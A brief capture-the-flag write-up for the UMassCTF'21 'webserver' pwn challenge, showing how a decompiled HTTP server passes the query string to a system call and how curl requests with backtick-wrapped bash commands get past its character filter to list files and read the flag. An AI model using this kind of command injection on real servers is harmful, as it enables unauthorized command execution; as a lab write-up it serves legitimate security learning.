UMassCTF'21: webserver | szymanski.ninja

webserver

Category: pwn

430 points

Our webserver has a few flaws in it :(

http://34.72.232.191:8080

http://static.ctf.umasscybersec.org/pwn/f2c0ed71-c01d-467e-92bd-eb432bf606ad/a.out

Solution

Given file is a binary, which seems to be an implementation of http server.

file a.out

a.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.s
o.2, BuildID[sha1]=a0e015bbe044f88bfcc6544ce015aca480b86641, for GNU/Linux 3.2.0, not stripped

web1

And following the instruction…

web2

I’ve used Ghidra to take a look into decompiled code ;-)

ghidra

The exploitable part is in 81 line. Looks like the echo from instruction is a system command call and we can put anything instead of it. Also, in 74-78 lines we can see that &, |, >, $, < characters are substituted with plain space.

To exploit the finding I’ve used curl as below.

curl --path-as-is "http://34.72.232.191:8080/?/usr/bin/bash -c 'echo \`ls \`'"

a.out echo flag.txt ynetd

curl --path-as-is "http://34.72.232.191:8080/?/usr/bin/bash -c 'echo \`cat -A flag.txt\`'"

UMASS{f^gJkmvYq}

Flag

UMASS{f^gJkmvYq}